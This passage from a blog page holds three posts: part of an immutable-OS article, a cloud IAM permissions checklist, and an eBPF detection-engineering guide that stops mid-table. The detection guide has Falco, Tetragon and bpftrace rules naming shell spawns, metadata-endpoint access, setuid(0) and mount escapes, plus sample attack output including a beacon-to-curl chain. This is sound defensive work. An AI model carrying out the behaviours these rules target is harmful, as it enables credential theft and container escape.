$ rpm-ostree rollback
Moving 'ostree://fedora:fedora/38/x86_64/coreos' (38.20240115.2.0) to be first deployment
Run "systemctl reboot" to start a rollback

$ systemctl reboot

The ● marks the currently booted deployment. The second entry never disappeared when the update landed — it’s exactly the filesystem that was running two weeks ago, byte for byte, ready to boot again.

bootc — covered in depth in EP04 — applies the same A/B model but defines the OS image as an OCI container image, built with a standard Containerfile and pushed to a normal container registry. The deployment mechanism is the same; the packaging format is the one most infrastructure teams already have tooling for.

What You Give Up, and What You Get Back

	Traditional mutable OS	Immutable OS
`apt install`/`dnf install` on a running node	Works, silently drifts the system	Fails — no writable path for it to take
Config-management convergence loop	Required to fight drift	Not needed — nothing to converge
“What changed since deployment?”	Shell history, playbook logs, guesswork	`rpm-ostree status` / `bootc status` — exact, versioned answer
Undoing a bad update	Reinstall, restore from backup, or manual repair	One command, one reboot
Auditing compliance months later	Grade describes the image, not the running system	Grade describes the running system, because it can’t have changed
Debugging tools installed ad hoc	Common, invisible in inventory	Requires a new image — visible in version control

The trade-off is real: an immutable OS removes a workflow a lot of engineers rely on — the quick SSH fix. That’s not a bug in the design. It’s the entire point. If the quick fix is impossible, it can’t happen accidentally, and it can’t happen without going through review.

Three Ways This Actually Ships Today

This series covers each of these in depth over the coming episodes — for now, know they exist and roughly where each one fits:

Fedora CoreOS / Silverblue (EP03) — ostree-based, general-purpose immutable Linux. CoreOS targets servers and container hosts; Silverblue targets immutable desktops. Both use rpm-ostree for the deployment model shown above.
bootc (EP04) — an immutable OS image defined as a container image and booted directly, no separate “OS build” toolchain from your application build toolchain. Newer, and increasingly the direction RHEL-family distros are heading.
Talos Linux (EP05) — purpose-built for Kubernetes nodes. No SSH, no shell, no package manager at all — the only interface is an API (talosctl). The most aggressive point on this spectrum: not just read-only, but no interactive access whatsoever.

None of these require you to abandon Stratum. A bootc image or a Fedora CoreOS image can still be built from a hardened, CIS-benchmarked base — the hardening pipeline and the immutability model solve different problems and compose cleanly.

Production Gotchas

Immutability doesn’t mean “no state.” /etc and /var are typically still writable on ostree-based systems (application data, logs, local config overrides have to live somewhere). “Immutable” means the OS binaries and base configuration can’t be mutated in place — read the docs for your specific distro to know exactly what’s writable.

Rollback isn’t instant if you don’t test it first. rpm-ostree rollback works, but if you’ve never practiced it, the first time you run it under incident pressure is the wrong time to discover a health check you forgot to configure. Rehearse rollback the same way you’d rehearse a database failover.

Container image tooling doesn’t automatically make an OS image safe. bootc images are built like container images, which means it’s easy to accidentally treat them like disposable containers instead of long-lived OS deployments — with all the patching and lifecycle discipline that implies.

Not everything you run today has an immutable-OS story yet. Legacy configuration management (Puppet/Chef agents that expect to write to /etc continuously) and some monitoring agents assume a mutable filesystem. Check compatibility before you migrate a fleet.

Quick Reference

# ostree/rpm-ostree (Fedora CoreOS, Silverblue)
rpm-ostree status                  # current + staged deployments
rpm-ostree upgrade                 # stage the next image
rpm-ostree rollback                # revert to the previous deployment
ostree admin status                # lower-level deployment inspection

# bootc
bootc status                       # current + staged image, digest-pinned
bootc upgrade                      # pull and stage the next image
bootc rollback                     # revert to the previous deployment

# Talos Linux (API-only, no shell)
talosctl version                   # node + API version
talosctl get machineconfig         # current applied config
talosctl upgrade --image <ref>     # stage a new node image

Key Takeaways

A hardened image is a build-time guarantee; an immutable OS is what makes that guarantee hold at runtime too
Atomic A/B deployment means the system is never caught half-updated, and the previous deployment is always intact for rollback
Config-management convergence fights drift on a schedule; immutability removes the writable path drift needs to happen at all
rpm-ostree/bootc give you an exact, versioned answer to “what changed” instead of shell history and guesswork
This composes with Stratum’s hardening pipeline — it doesn’t replace it

What’s Next

EP01 established the gap: hardening proves an image correct once, at build time, and a mutable root filesystem gives that proof an expiration date nobody tracks. EP02 goes one level deeper into the mechanism that closes it — exactly how ostree and bootc implement atomic A/B updates under the hood, including how the bootloader is involved and what “atomic” actually guarantees.

Next: EP02 — Atomic OS Updates Explained: How ostree and bootc Actually Work

Get EP02 in your inbox when it publishes → linuxcent.com/subscribe

New Cloud Service IAM Permissions: A Checklist Before You Grant Access

July 6, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

← EP12: Zero Trust Access in the Cloud · EP13: New-Service IAM Checklist · All Cloud IAM Episodes →

TL;DR

New cloud service IAM permissions ship on GA day — often before your Terraform provider, internal IaC modules, or team wiki catch up
The fast path is service:* on Resource: * — the tempting unblock, and also how wildcard debt starts (see EP09’s least-privilege audit)
Five-step checklist: find the exact actions, scope the resource, dry-run before granting, attach a guardrail, and put a 30-day review on the calendar
AWS has no single CLI call that lists “every action for a service” — use the Service Authorization Reference plus IAM Access Analyzer’s policy generation from real CloudTrail activity
GCP’s gcloud iam list-testable-permissions returns the exact permissions grantable on a specific resource — scoped to what that resource type actually supports
Azure’s az provider operation show --namespace Microsoft.<Service> lists every operation a resource provider exposes, before you write a single role assignment

The Big Picture

  NEW CLOUD SERVICE SHIPS — THE FIRST GRANT DECIDES THE NEXT YEAR

  Provider ships GA
         │
         ▼
  Team requests access ──────► Tempting shortcut: "service:*" on "*"
         │                      (unblocks today, becomes next year's
         │                       wildcard-debt line item in EP09's audit)
         ▼
  STEP 1 — Find the exact actions the task needs
         │   (Service Authorization Reference · list-testable-permissions ·
         │    provider operation show)
         ▼
  STEP 2 — Scope the resource, not the account
         │   (ARN pattern / resource URI / resource group — never "*")
         ▼
  STEP 3 — Dry-run before granting
         │   (simulate-principal-policy · policy-troubleshoot iam · what-if)
         ▼
  STEP 4 — Attach a guardrail, not just a grant
         │   (permission boundary / SCP · Org Policy · Azure Policy)
         ▼
  STEP 5 — Put a 30-day review on the calendar
         │   (provisional access, not permanent — EP09's audit is the
         │    backstop for whatever step 5 misses)
         ▼
  Access granted: scoped, guarded, and time-boxed

Introduction

New cloud service IAM permissions land the same day a provider ships something new — usually before your Terraform provider, your internal enablement docs, or anyone’s muscle memory has caught up. A team wants to use the new service today, and the fastest way to unblock them is a wildcard: service:* on Resource: *. It works immediately. It also never gets revisited.

I’ve seen this pattern enough times across AWS, GCP, and Azure environments to stop treating it as a one-off mistake and start treating it as a predictable failure mode. Every cloud provider ships new services and new API actions on existing services continuously — thousands of changes a year across the big three. IAM has to keep up with all of it, and nobody’s tooling updates same-day. The gap between “the service exists” and “the least-privilege policy for it exists” is where every wildcard grant in your account was born.

This episode is the checklist I use to close that gap before it becomes EP09’s least-privilege audit problem six months later.

Why This Keeps Happening

Cloud providers version their IAM action sets independently of their service launches. A service can go GA with its full action list, then add new actions for a feature shipped three months later — with no changelog most teams are subscribed to. Preview and beta services are worse: action names occasionally change between preview and GA, which means a policy scoped correctly during the beta can silently stop matching after the rename.

None of this is a documentation failure you can fix by reading more carefully. It’s a structural lag between provider release velocity and your policy review cycle. The fix isn’t reading faster — it’s having a checklist that runs the same way every time a new service shows up in a support ticket.

Step 1: Find the Exact Actions the Task Needs

AWS

AWS doesn’t expose a single CLI call that lists “every action for this service.” The two real sources:

The Service Authorization Reference — the canonical, per-service action/resource/condition-key list. Not a CLI, but the ground truth.
IAM Access Analyzer’s policy generation — build a least-privilege policy from what a role actually called, not from the full service action list:

# Let a trial role use the new service for a short period first, then generate
# a policy scoped to only the actions that were actually invoked
aws accessanalyzer start-policy-generation \
  --policy-generation-details principalArn=arn:aws:iam::123456789012:role/new-service-trial-role \
  --cloud-trail-details '{
    "trails": [{"cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/management-trail", "allRegions": true}],
    "accessRole": "arn:aws:iam::123456789012:role/AccessAnalyzerMonitorRole"
  }'

# Poll for the generated policy once the job completes
aws accessanalyzer get-generated-policy --job-id <JOB_ID>

For operators: this generates a policy from observed API calls, not theoretical need. Run the trial role for long enough to exercise every code path the team actually uses — a policy generated from five minutes of testing will be too narrow for production.

GCP

# Returns the exact permissions that CAN be granted on this specific resource —
# scoped to what that resource type supports, not the whole service
gcloud iam list-testable-permissions \
  //aiplatform.googleapis.com/projects/my-project/locations/us-central1

Reading the output: each returned permission is one your team might plausibly need — GCP won’t list permissions that don’t apply to this resource type. Cross-reference against the task at hand and grant only the subset actually required.

Azure

# Lists every operation (permission) a resource provider namespace exposes
az provider operation show \
  --namespace Microsoft.CognitiveServices \
  --query "[].{Operation:name, Description:display.description}" \
  -o table

This is the full menu for the namespace — most tasks need a handful of these operations, not all of them. Use it to find the exact operation string for a custom role definition rather than reaching for a built-in Contributor-level role.

Step 2: Scope the Resource, Not the Account

Finding the right action is half the job. The other half is refusing "Resource": "*".

// Bad — every foundation model, in every region, forever
{
  "Effect": "Allow",
  "Action": "bedrock:*",
  "Resource": "*"
}

// Better — scoped to the specific model family the team asked for
{
  "Effect": "Allow",
  "Action": ["bedrock:InvokeModel"],
  "Resource": "arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude*"
}

The same discipline applies in GCP (bind the role to the specific project or resource, not the organization) and Azure (scope the role assignment to the resource group, not the subscription). A new service is the easiest moment to get this right — there’s no existing wildcard grant to “just extend.”

Step 3: Dry-Run Before You Grant

Test the policy against the real action before it’s live.

# AWS: simulate whether a principal's policy allows a specific action on a specific resource
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::123456789012:role/new-service-role \
  --action-names bedrock:InvokeModel \
  --resource-arns arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-v2

# GCP: Policy Troubleshooter — does this principal have this permission on this resource, and why (or why not)?
gcloud policy-troubleshoot iam \
  //aiplatform.googleapis.com/projects/my-project/locations/us-central1 \
  --principal-email=svc-new-service@my-project.iam.gserviceaccount.com \
  --permission=aiplatform.endpoints.predict

# Azure: preview what an IaC deployment (including role assignments) will change before applying it
az deployment group what-if \
  --resource-group rg-new-service \
  --template-file role-assignment.bicep

None of these grant access. All three tell you, before the grant is live, whether the policy you wrote actually does what you think it does.

Step 4: Attach a Guardrail, Not Just a Grant

A grant without a guardrail is one typo away from being an account-wide wildcard. Pair every new-service grant with a boundary that survives the next person copy-pasting the policy:

AWS — a permission boundary on the role, or an SCP restricting the new service to specific OUs until it’s been reviewed
GCP — an Org Policy constraint limiting resource locations or restricting which services can be enabled in the first place
Azure — an Azure Policy assignment enforcing an allowed-services list at the subscription or management group level

The guardrail is what keeps “we scoped it correctly on day one” true after the policy gets copied into three other roles by someone who wasn’t in this conversation.

Step 5: Put a 30-Day Review on the Calendar

Treat every new-service grant as provisional, not permanent. A calendar reminder — not a ticket that can sit in a backlog — to check actual usage against granted permissions 30 days out.

This is the same discipline EP09’s least-privilege audit runs at the account level, applied at the moment of grant instead of six months later. Step 5 is what catches the case where the team’s actual usage turned out narrower than the trial period suggested — or wider, because the trial period didn’t exercise every path.

Production Gotchas

Mistake	Impact	Fix
Granting console-wide access “temporarily” while waiting for Terraform provider support	Temporary access outlives the wait — nobody revokes it once the provider resource ships	Time-box the console grant explicitly; automate its removal, don’t rely on memory
Scoping a policy to a preview/beta action name	Silent breakage (or worse, silent continued access via an old wildcard) when the action renames at GA	Re-verify the action name against the Service Authorization Reference at GA, not just at preview
Assuming a new service reuses an existing condition key	Policy conditions that “should” restrict access silently don’t apply, because the new service doesn’t support that key	Check the service’s supported condition keys before reusing an existing policy pattern
Trial period too short for Access Analyzer’s policy generation	Generated policy is too narrow; production breaks on day one under real load	Run the trial long enough to exercise every code path, including error and retry paths

Quick Reference

Task	AWS	GCP	Azure
Discover exact actions	Service Authorization Reference + `accessanalyzer start-policy-generation`	`gcloud iam list-testable-permissions <resource>`	`az provider operation show --namespace <Provider>`
Dry-run a grant	`aws iam simulate-principal-policy`	`gcloud policy-troubleshoot iam`	`az deployment group what-if`
Guardrail	Permission boundary / SCP	Org Policy constraint	Azure Policy assignment
Recurring check	`aws accessanalyzer` unused-access findings	IAM Recommender	Access Reviews

Framework Alignment

Framework	Control / ID	Mapping
CISSP	Domain 5 — IAM	Least privilege enforced at initial provisioning, not discovered later through audit
CISSP	Domain 1 — Security & Risk Management	Provisional access as a risk-acceptance decision with an explicit review date
ISO 27001:2022	5.15 Access control	Access rights defined and scoped to business need at the point of grant
ISO 27001:2022	5.18 Access rights	Review of access rights — extended here to newly granted permissions, not just standing ones
SOC 2	CC6.1	Logical access controls restrict access to authorized users and processes from first grant
SOC 2	CC6.3	Access is modified or revoked based on a defined review cadence

Key Takeaways

New cloud service IAM permissions ship on the provider’s schedule, not yours — the checklist has to run the same way every time, not only when someone remembers
The fast path (service:* on *) is also the path to next year’s wildcard-debt finding — scope it once, at the point of grant, instead of unwinding it later
AWS, GCP, and Azure each expose a different tool for discovering exact actions — none of them is “read the whole service’s docs and guess”
A grant without a guardrail (permission boundary, SCP, Org Policy, Azure Policy) is one copy-paste away from becoming account-wide
Provisional access needs an expiration built in from day one — a 30-day calendar review, not a hope that someone runs the audit eventually

What’s Next

This series doesn’t have a fixed episode count anymore — new cloud service IAM permissions are a continuous stream across AWS, GCP, and Azure, and this series continues covering them as they matter operationally, not on a fixed syllabus.

Get the next Cloud IAM episode in your inbox → linuxcent.com/subscribe

Detection Engineering with eBPF: Kernel-Level Visibility for Cloud Incidents

July 6, 2026 by Vamshi Krishna Santhapuri

Reading Time: 13 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes container escape → Supply chain attack detection → Cloud lateral movement → Detection Engineering with eBPF

TL;DR

Detection engineering with eBPF addresses OWASP A09 directly: most process-level attack techniques leave no trace in CloudTrail, VPC Flow Logs, or syslog — eBPF hooks in the kernel observe them before the attacker has any ability to suppress the record
CloudTrail is API-plane only; VPC Flow Logs are network-plane only with a 15-minute aggregation delay and no process context; syslog captures only what userspace processes voluntarily emit — all three miss the OS-level attack surface entirely
eBPF attaches to kernel syscall tracepoints and kprobes to capture connect(), execve(), mount(), setuid(), and open() with full context: PID, process name, container cgroup, parent process, timestamp — in real time
Falco and Tetragon are the production-grade always-on options; bpftrace is the ad-hoc investigation tool — use each for what it is designed for
Tetragon’s TracingPolicy can kill a process at the moment of the violating syscall, before the attack completes — this is enforcement, not just alerting
Every attack in EP07 through EP10 has a detectable kernel-level signal; this episode maps each one to a concrete eBPF detection rule

OWASP Mapping: A09 Security Logging and Monitoring Failures — the structural gap this series has referenced from EP04 onward: attacks that succeed not because defenses are absent, but because the telemetry layer cannot see the OS surface where the attacks execute.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                  DETECTION ENGINEERING WITH eBPF                        │
│                                                                         │
│   KERNEL SPACE                          USERSPACE                       │
│                                                                         │
│   syscall/kprobe hooks                                                  │
│   ┌──────────────────┐                                                  │
│   │ connect()        │──▶ ring buffer ──▶ Tetragon ──▶ Hubble/SIEM     │
│   │ execve()         │                                                  │
│   │ mount()          │──▶ ring buffer ──▶ Falco   ──▶ Slack/PagerDuty │
│   │ setuid()         │                                                  │
│   │ open()           │──▶ perf buffer ──▶ bpftrace ──▶ stdout/log     │
│   └──────────────────┘                                                  │
│          │                                                              │
│          │  Context captured at hook:                                   │
│          │  PID · comm · cgroup (container ID) · args · timestamp      │
│          │  parent PID · network namespace · mount namespace           │
│                                                                         │
│   ═══════════════════════════════════════════════════════════           │
│   WHAT OTHER TOOLS SEE                                                  │
│   CloudTrail:     API calls only — nothing below the AWS SDK            │
│   VPC Flow Logs:  src/dst IP+port only — 15-min delay, no PID          │
│   Syslog:         What the process chose to log — attacker controls it  │
│   eBPF:           Every syscall — attacker cannot suppress it          │
│                   without kernel access                                 │
└─────────────────────────────────────────────────────────────────────────┘

Detection engineering with eBPF closes the observability gap that every previous episode in this series exploited. The SSRF in EP07 made an outbound connection to 169.254.169.254 — the EC2 metadata endpoint — from a web application process. VPC Flow Logs show that IP eventually. CloudTrail shows nothing. eBPF shows the connect() syscall with the PID, the process name, the container cgroup ID, and the timestamp, in the sub-millisecond window it occurred.

The Problem: Your SIEM Has a 15-Minute Hole

During a cloud incident response engagement, the question came up in the first hour: did this process make any outbound connections in the last 30 minutes?

Four telemetry sources, four answers:

CloudTrail: Not applicable. CloudTrail records AWS API calls. A process inside an EC2 instance making a raw TCP connection to an external IP — or to the metadata endpoint — is OS-level activity. CloudTrail has no record of it.

VPC Flow Logs: Maybe, eventually. Flow Logs aggregate at 1-minute or 10-minute intervals (configurable), then land in S3 or CloudWatch Logs with additional delay. In practice, you’re looking at 10–15 minutes before the data is queryable. The flow record contains source IP, destination IP, source port, destination port, protocol, bytes, packets — and nothing else. There is no PID. There is no process name. There is no indication of which container inside the EC2 instance made the connection. If ten pods are running on the same node, VPC Flow Logs tells you the node talked to an external IP. You don’t know which pod.

Syslog: Nothing logged. The process — a compromised web application exploited via SSRF — didn’t log the connection. It wouldn’t. Application code doesn’t emit syslog entries for every outbound connection it makes. And an attacker controlling the process would not add logging.

eBPF TC hook: Every TCP connection attempt, from the moment it entered the network stack, with PID, process name, container cgroup ID, destination IP, destination port, source IP, and timestamp — in real time, with zero delay.

That is the gap. Everything in EP04 through EP10 of this series lived in it.

The OWASP A09 framing is exactly right: these are not failures of detection rules, they are failures of the telemetry layer. You cannot write a SIEM rule for data that is never collected. eBPF collects the data that the other layers structurally cannot.

What eBPF Detects That Other Tools Miss

Technique	CloudTrail	VPC Flow Logs	Syslog	eBPF
Process spawn inside container	No	No	Maybe (if auditd configured)	Yes — execve(): PID, command, args, parent PID, container cgroup
Outbound TCP connection	No	IP+port, 15-min delay, no PID	No	connect(): IP+port+PID+comm+container, real-time
File write to /etc/passwd	No	No	No	openat()+write(): exact path, PID, comm, container
Privilege escalation (setuid/setgid)	No	No	Maybe (auditd)	Yes — setuid() syscall args: target UID, calling PID, comm
Container escape attempt via mount	No	No	No	mount(): args, mount namespace ID, calling PID — namespace mismatch detectable
SSRF to 169.254.169.254	No	IP only, 15-min delay	No	connect() from app process to metadata IP — PID, comm, container, real-time
Binary execution with unusual parent	No	No	No	execve(): full parent chain — detects shell spawned from web process
Kubernetes secret file read	No	No	No	openat() on /run/secrets/kubernetes.io/serviceaccount/token
STS credential fetch from Lambda	No	Endpoint IP only	No	connect() to sts.amazonaws.com from unexpected process

The pattern across the table is consistent: CloudTrail covers the AWS control plane. VPC Flow Logs cover the network plane with delay and no process context. Syslog covers what processes choose to emit. eBPF covers the syscall surface — the layer where every one of these events must pass, regardless of what the attacker wants.

For operators not writing eBPF: This table tells you what your current SIEM can and cannot see. If your threat model includes container escapes, SSRF-to-metadata attacks, or post-compromise lateral movement through process execution, the detection signal for those techniques does not exist in your CloudTrail or your flow logs. It exists only at the kernel level.

Detection Rule 1: Unexpected Outbound from an Application Container

The SSRF attack in EP07 — and the lateral movement in EP10 — both required an outbound TCP connection from a process that had no legitimate reason to make one. This is the detection.

Ad-hoc investigation with bpftrace

When you’re on a node right now and need to know what’s connecting outbound:

# Shows PID, process name, and destination IP in real time
# Run on the node (requires root or CAP_BPF)
bpftrace -e '
#include <linux/socket.h>
#include <linux/in.h>

tracepoint:syscalls:sys_enter_connect {
  $sa = (struct sockaddr_in *)args->uservaddr;
  if ($sa->sin_family == AF_INET) {
    printf("connect: pid=%-6d comm=%-20s dst=%s:%d\n",
           pid,
           comm,
           ntop($sa->sin_addr.s_addr),
           (uint16)bswap($sa->sin_port));
  }
}
'

Sample output — what you’d see during an SSRF exploit targeting the EC2 metadata service:

connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18432  comm=curl                 dst=169.254.169.254:80

The python3 process — your web application — connecting to 169.254.169.254 is the metadata endpoint. That’s not a legitimate application dependency. That’s the SSRF signal.

bpftrace — kernel answers in one line goes deep on the tracepoint/kprobe model and how to filter by cgroup for container-specific traces. The one-liners above are the starting point; that post covers building targeted investigation scripts.

Production-grade enforcement with Tetragon

bpftrace is for investigation. Tetragon is for always-on detection — and optionally, prevention.

# TracingPolicy: alert on outbound connections from non-host network namespaces
# (any container making outbound TCP connections)
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-outbound-connections"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchNamespaces:
      - namespace: Net
        operator: NotIn
        values:
        - "host"
      matchActions:
      - action: Post   # Generate an alert event; change to Sigkill to prevent

To detect specifically the SSRF-to-metadata pattern — connections to 169.254.169.254:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-imds-access"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "169.254.169.254/32"
      matchActions:
      - action: Post
        rateLimit: "1/minute"

Tetragon events include process_kprobe JSON with the pod name, namespace, container ID, binary path, parent binary, and all arguments. This feeds directly into your SIEM or to Hubble’s flow log.

Detection Rule 2: Process Execution Inside a Container

A shell spawning inside a container that has no business running a shell is a post-compromise indicator. It covers the container escape setup from EP08, the supply chain implant from EP09, and any hands-on-keyboard phase after initial access.

Falco rule: shell spawned from application container

# Falco rule: detect any shell spawned in a container
# Add to /etc/falco/rules.d/purple-team.yaml
- list: shell_binaries
  items: [bash, sh, zsh, ksh, fish, tcsh, csh, dash]

- list: allowed_shell_images
  items: [
    "debug-tools",     # Your approved debug container image names
    "toolbox"
  ]

- rule: Shell Spawned in Container
  desc: >
    A shell was spawned inside a container. In application containers (web servers,
    APIs, data processors) this is almost always a post-compromise indicator.
  condition: >
    evt.type = execve and
    evt.dir = < and
    container and
    container.image.repository != "" and
    proc.name in (shell_binaries) and
    not proc.pname in (shell_binaries) and
    not container.image.repository in (allowed_shell_images) and
    not k8s.ns.name in (kube-system, kube-public)
  output: >
    Shell spawned in container
    (user=%user.name
     container=%container.name
     image=%container.image.repository
     cmd=%proc.cmdline
     parent=%proc.pname
     pod=%k8s.pod.name
     ns=%k8s.ns.name)
  priority: WARNING
  tags: [purple-team, post-compromise, container]

The proc.pname condition is the key signal: a shell spawned by a web server process (nginx, node, gunicorn, java) is a different threat than a shell spawned by another shell in a debug context. The rule above passes the second case through the allowed_shell_images exclusion; it flags the first.

Detecting the supply chain implant pattern

EP09 covered supply chain attacks where a build artifact executes unexpected binaries at runtime. The bpftrace version for ad-hoc investigation of what a specific container is executing:

# bpftrace: trace all execve() calls from processes inside a specific container
# First, find the container's cgroup ID:
# systemd-cgls | grep <pod-name>
# Or: cat /sys/fs/cgroup/unified/<cgroup-path>/cgroup.procs

bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  printf("execve: pid=%-6d ppid=%-6d comm=%-20s file=%s\n",
         pid,
         curtask->real_parent->tgid,
         comm,
         str(args->filename));
}
' 2>/dev/null | grep -v "^\[" | head -50

Sample output during a supply chain compromise scenario — unexpected binary execution from a package manager implant:

execve: pid=31204  ppid=31190  comm=node                 file=/bin/sh
execve: pid=31205  ppid=31204  comm=sh                   file=/tmp/.x/beacon
execve: pid=31206  ppid=31205  comm=beacon               file=/usr/bin/curl

The chain node → sh → /tmp/.x/beacon → curl — application process spawning a shell, which executes an unknown binary from /tmp, which runs curl — is the supply chain implant execution pattern. None of this appears in CloudTrail.

Detection Rule 3: Privilege Escalation — setuid(0) and Capability Abuse

A process calling setuid(0) to elevate to root, or setcap to acquire new capabilities, is a privilege escalation indicator. The EP08 container escape path used a setuid binary to gain root inside the container as the first step toward escaping the namespace.

bpftrace: catch setuid(0) calls in real time

# bpftrace: alert on any process calling setuid(0)
# Any process attempting to switch to UID 0
bpftrace -e '
tracepoint:syscalls:sys_enter_setuid {
  if (args->uid == 0) {
    printf("ALERT setuid(0): pid=%-6d comm=%-20s ppid=%d pcomm=%s\n",
           pid,
           comm,
           curtask->real_parent->tgid,
           str(curtask->real_parent->comm));
  }
}
tracepoint:syscalls:sys_enter_setresuid {
  if (args->ruid == 0 || args->euid == 0) {
    printf("ALERT setresuid(root): pid=%-6d comm=%-20s\n", pid, comm);
  }
}
'

Falco rule: setuid binary execution inside container

- rule: Setuid Binary Executed in Container
  desc: >
    A setuid binary was executed inside a container. Setuid binaries inside
    containers are a privilege escalation path — they run as root regardless
    of the container's user setting.
  condition: >
    evt.type = execve and
    evt.dir = < and
    container and
    proc.is_suid_exe = true
  output: >
    Setuid binary executed in container
    (binary=%proc.exepath
     user=%user.name
     container=%container.name
     pod=%k8s.pod.name
     cmd=%proc.cmdline)
  priority: ERROR
  tags: [purple-team, privilege-escalation, container]

Detection Rule 4: Container Escape Attempt via Namespace-Crossing Mount

The privileged container escape path from EP08 requires calling mount() from a container namespace to access the host filesystem. The kernel records the mount namespace of the calling process — an eBPF kprobe on mount() can detect when the caller’s mount namespace differs from the host namespace.

Tetragon policy: kill any mount from a non-host namespace

# This covers the --privileged container escape path documented in EP08
# The mount() call that crosses from container namespace to host filesystem
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-container-mount-escape"
spec:
  kprobes:
  - call: "security_sb_mount"
    syscall: false
    args:
    - index: 0
      type: "string"     # dev_name
    - index: 3
      type: "string"     # mount flags
    selectors:
    - matchNamespaces:
      - namespace: Mnt
        operator: NotIn
        values:
        - "host"
      matchArgs:
      - index: 0
        operator: "NotEqual"
        values:
        - "proc"
        - "sysfs"
        - "tmpfs"        # Common legitimate mounts in containers
      matchActions:
      - action: Sigkill
        rateLimit: "10/minute"

Start with action: Post and tune the exclusions for your environment before switching to Sigkill. See the production gotchas below.

bpftrace: ad-hoc namespace crossing investigation

# bpftrace: trace mount() calls and show the mount namespace of the caller
# Mount namespace ID of the host: read from /proc/1/ns/mnt
HOST_MNT_NS=$(readlink /proc/1/ns/mnt | grep -oP '\d+')

bpftrace -e '
#include <linux/nsproxy.h>
#include <linux/mount.h>

kprobe:__x64_sys_mount {
  $nsproxy = (struct nsproxy *)curtask->nsproxy;
  $mnt_ns_id = $nsproxy->mnt_ns->ns.inum;
  printf("mount: pid=%-6d comm=%-20s mnt_ns=%u\n",
         pid, comm, $mnt_ns_id);
}
' 2>/dev/null

Compare the mnt_ns value in output against $HOST_MNT_NS. Any mount call with a mnt_ns value other than the host’s is from inside a container. A privileged container attempting host filesystem access shows a container namespace ID.

Building a Detection Pipeline

Ad-hoc bpftrace commands answer questions during an incident. Always-on detection requires a pipeline that runs continuously, routes alerts to a durable destination, and survives pod restarts. The two production-grade options in this stack:

eBPF hooks
    │
    ├── Tetragon (always-on, Kubernetes-native)
    │       └── TracingPolicy CRDs
    │               └── JSON events → Hubble → Grafana
    │                               → SIEM (Splunk/Elastic)
    │                               → PagerDuty
    │
    └── Falco (rule-based, declarative)
            └── /etc/falco/rules.d/*.yaml
                    └── falcosidekick
                            ├── Slack
                            ├── PagerDuty
                            ├── Elasticsearch
                            └── AWS Lambda (custom response)

The TC eBPF pod-level network policy post covers how Cilium and Tetragon share the same underlying kernel attachment points — understanding TC hooks helps explain why Tetragon’s network-level policies fire at the same layer as Cilium’s NetworkPolicy enforcement.

Falco with falcosidekick: complete local testing setup

Use this to validate your Falco rules before deploying to a cluster. It routes Falco alerts to Slack in real time.

# docker-compose.yml — local Falco + falcosidekick testing
# Requires: Docker with kernel headers or eBPF driver support
version: "3.8"

services:
  falco:
    image: falcosecurity/falco-no-driver:latest
    privileged: true
    volumes:
      - /var/run/docker.sock:/host/var/run/docker.sock
      - /dev:/host/dev
      - /proc:/host/proc:ro
      - /boot:/host/boot:ro
      - /lib/modules:/host/lib/modules:ro
      - /usr:/host/usr:ro
      - /etc/falco:/etc/falco
      - ./rules:/etc/falco/rules.d:ro
    environment:
      FALCO_GRPC_ENABLED: "true"
      FALCO_GRPC_BIND_ADDRESS: "0.0.0.0:5060"
    ports:
      - "5060:5060"
    command: >
      /usr/bin/falco
        --modern-bpf
        -o "json_output=true"
        -o "grpc.enabled=true"
        -o "grpc_output.enabled=true"

  falcosidekick:
    image: falcosecurity/falcosidekick:latest
    depends_on:
      - falco
    environment:
      FALCO_GRPC_CONN: "falco:5060"
      FALCO_GRPC_TLS: "false"
      SLACK_WEBHOOKURL: "${SLACK_WEBHOOK}"
      SLACK_MINIMUMPRIORITY: "warning"
      SLACK_MESSAGEFORMAT: >
        "[{{.Priority}}] {{.Rule}}
        | pod={{.OutputFields.k8s_pod_name}}
        | ns={{.OutputFields.k8s_ns_name}}
        | cmd={{.OutputFields.proc_cmdline}}"
    ports:
      - "2801:2801"

# Start the stack (set SLACK_WEBHOOK first)
export SLACK_WEBHOOK="https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
docker compose up -d

# Trigger a test alert: exec into any running container
docker exec -it <any-container> /bin/sh

# Check falcosidekick received it
curl -s http://localhost:2801/metrics | grep falcosidekick_inputs_total

Deploying Falco to Kubernetes with Helm

# Add Falco Helm repo
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

# Install Falco with eBPF driver (not kernel module — required in Kubernetes)
helm install falco falcosecurity/falco \
  --namespace falco \
  --create-namespace \
  --set driver.kind=modern_ebpf \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
  --set falcosidekick.config.slack.minimumpriority=warning \
  --set customRules."purple-team\.yaml"="$(cat ./rules/purple-team.yaml)"

# Verify Falco pods are running on all nodes
kubectl get pods -n falco -o wide

# Tail Falco logs for a specific node's pod
kubectl logs -n falco -l app.kubernetes.io/name=falco -f

# Validate a specific rule is loaded
kubectl exec -n falco <falco-pod> -- falco --list-rules 2>/dev/null | grep "Shell Spawned"

What This Means for Each Prior Attack

Every attack in EP07 through EP10 had a detectable kernel-level signal that the standard telemetry stack missed. Here’s the detection mapping:

Episode	Attack	What Standard Telemetry Missed	eBPF Detection Signal
